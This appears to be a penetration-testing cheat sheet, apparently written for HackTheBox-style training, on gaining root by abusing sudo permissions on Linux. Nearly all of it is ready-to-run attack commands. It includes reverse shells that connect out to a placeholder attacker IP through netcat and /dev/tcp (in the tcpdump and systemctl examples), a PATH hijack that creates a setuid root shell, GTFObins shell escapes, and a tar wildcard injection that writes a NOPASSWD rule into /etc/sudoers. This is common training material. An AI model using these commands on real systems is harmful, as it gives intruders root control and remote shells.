8.Sudo-rights-abuse

# 1. Check sudo privileges
sudo -l

# 2. Identify vulnerable sudo entries (e.g., NOPASSWD with dangerous commands)
sudo -l | grep -E '(tcpdump|vim|nmap|find|less|\*)'

# 3. Example: tcpdump -z exploit (if applicable)

# Create malicious script (reverse shell)
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <YOUR_IP> <YOUR_PORT> >/tmp/f' > /tmp/.test
chmod +x /tmp/.test

# Start netcat listener on your attacking machine
nc -lnvp <YOUR_PORT>

# Execute tcpdump with sudo and -z option
sudo /usr/sbin/tcpdump -ln -i ens192 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root

# 4. Example: If a command like 'cat' is allowed in sudoers without absolute path.

# Find a writable directory in your path.
echo $PATH | tr ":" "\n"

# In a writable directory, create a malicious 'cat'
echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' > cat
chmod +x cat

# Then run the sudo command.
sudo cat /etc/shadow

# Then execute the root bash.
/tmp/rootbash -p

# 5. Best Practices Check:
# Check the sudoers file for absolute paths:
sudo visudo -c

# Check the sudoers file for unnecessary ALL permissions:
sudo visudo -l

# 6. GTFObins Example for sudo abuse of a binary.
sudo vim -c ':!/bin/sh'
sudo nmap --interactive -c '!sh'
sudo find . -exec /bin/bash \;
sudo less /etc/passwd -c '!/bin/sh'

# 7. Example: if sudo can run tar without password and wildcards are present.
# Create malicious files
echo 'echo "htb-student ALL=(root) NOPASSWD: ALL" >> /etc/sudoers' > root.sh
echo "" > "--checkpoint-action=exec=sh root.sh"
echo "" > --checkpoint=1

# Check sudo privileges
sudo -l

# If successful, escalate to root
sudo su

# 8. Example: if sudo can run zip without password.
sudo zip -TT 'sh #' /dev/null

# 9. Example: if sudo can run awk without password.
sudo awk 'BEGIN {system("/bin/sh")}'

# 10. Example: if sudo can run systemctl without password.
sudo systemctl --force --batch enable 'sh -c "sh -i >& /dev/tcp/<YOUR_IP>/<YOUR_PORT> 0>&1".service'
sudo systemctl start sh-c*.service